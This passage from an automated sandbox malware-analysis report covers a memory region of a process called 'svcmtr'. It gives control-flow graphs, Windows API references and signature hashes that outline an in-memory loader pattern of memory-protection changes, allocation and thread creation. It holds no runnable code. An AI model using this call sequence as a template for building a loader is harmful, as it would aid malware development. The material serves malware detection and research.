                                                                                                                            • Opcode ID: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction ID: d34ac70a124d5ab01515cd46ee62588fb34addd97495f0f1b6d5c9fc03f0b873
                                                                                                                            • Opcode Fuzzy Hash: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction Fuzzy Hash: 8661E9B2E34728CFDB19CE64CC817ADF772BF85304F1586AAC006AB254DBB059659F81

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 103 23137c-23148f call 230af8 * 2 call 230c47 VirtualProtect 116 231491-2314a4 103->116 117 2314a9-2314f1 103->117 116->117 120 2314f7-231559 117->120 124 23155b-231561 120->124
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002313E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction ID: b20c1959161d0f1f9c531eb60a5189586cdbcece0d3637516fb23815953db608
                                                                                                                            • Opcode Fuzzy Hash: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction Fuzzy Hash: C951E777E201249FEF0CCF69DC91ABCB7A2FBD4310F1A9129D506EF691DA7899108650

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 186 231639-2316aa call 230c47 VirtualProtect 196 2316ad-231724 call 230eb7 call 23172b 186->196 205 231726-231792 call 230af8 * 2 call 230c47 196->205 206 231795-231796 196->206 208 231797-23179e VirtualProtect 205->208 206->208 209 2317a3-2317d0 208->209 209->196 219 2317d6-2317e4 209->219
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 00231666
                                                                                                                              • Part of subcall function 0023172B: VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 314 231efa-231f3b call 230c47 322 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 314->322 323 231f41-231f49 314->323 361 232113 322->361 362 2320ae-2320af 322->362 323->322 325 231f4f-231f5f call 231f6a 323->325 333 231f61 325->333 334 231fca-231fd1 325->334 336 231fb3-231fc9 call 230c47 333->336 337 231f63 333->337 346 231fd6-231fe2 334->346 336->334 338 231f65-231fb2 call 230af8 * 2 337->338 339 231fd4-231fd5 337->339 338->336 339->346 346->322 364 232116-232119 361->364 363 2320b1-232119 call 230af8 * 2 call 230c47 362->363 362->364 366 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 363->366 364->366
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 398 231f25-231f3b 402 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 398->402 403 231f41-231f49 398->403 441 232113 402->441 442 2320ae-2320af 402->442 403->402 405 231f4f-231f5f call 231f6a 403->405 413 231f61 405->413 414 231fca-231fd1 405->414 416 231fb3-231fc9 call 230c47 413->416 417 231f63 413->417 426 231fd6-231fe2 414->426 416->414 418 231f65-231fb2 call 230af8 * 2 417->418 419 231fd4-231fd5 417->419 418->416 419->426 426->402 444 232116-232119 441->444 443 2320b1-232119 call 230af8 * 2 call 230c47 442->443 442->444 446 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 443->446 444->446
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 478 231013-23109c call 230af8 * 2 call 230c47 LoadLibraryA 491 23109e-2310ab 478->491 492 2310ad-2310b8 478->492 494 2310ba-2310f7 491->494 492->494 499 23124e-231264 494->499 500 2310fd-231107 494->500 508 231266-231279 499->508 509 231299-2312a8 499->509 501 231127-231142 500->501 502 231109-231125 500->502 511 231147-231163 call 23116e 501->511 502->511 512 23127b-23127e 508->512 519 231165-2311d3 call 230af8 * 2 call 230c47 511->519 520 2311d4-2311f8 511->520 513 231280-231293 512->513 514 231295-231297 512->514 513->512 514->509 519->520 528 2311fa-231206 520->528 529 23123e-231249 520->529 532 231236-23123b 528->532 533 231208-231216 528->533 532->529 535 231218-23121b 533->535 537 23122d-231231 535->537 538 23121d-23122b 535->538 537->532 538->535
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 543 231f30-231f3b 544 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 543->544 545 231f41-231f49 543->545 583 232113 544->583 584 2320ae-2320af 544->584 545->544 547 231f4f-231f5f call 231f6a 545->547 555 231f61 547->555 556 231fca-231fd1 547->556 558 231fb3-231fc9 call 230c47 555->558 559 231f63 555->559 568 231fd6-231fe2 556->568 558->556 560 231f65-231fb2 call 230af8 * 2 559->560 561 231fd4-231fd5 559->561 560->558 561->568 568->544 586 232116-232119 583->586 585 2320b1-232119 call 230af8 * 2 call 230c47 584->585 584->586 588 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 585->588 586->588
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction ID: c225a94fd12fe433039d9fde6172315fe83e0fb7a6822af79ad76f4c0217926d
                                                                                                                            • Opcode Fuzzy Hash: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction Fuzzy Hash: BB0149B5E3012A9AEF2D5B34CC59FBD7672FB90700F1882A9D84BE5042DB714A729E40
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction ID: d31bdf12b9d91aac1500cf151175c217257593f83f05e0711e82fec2d2b4caae
                                                                                                                            • Opcode Fuzzy Hash: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction Fuzzy Hash: B501F4B5D3012A9AEF294E30CC49FBD7635FB90704F1482A9D94AE2041EB310E729E80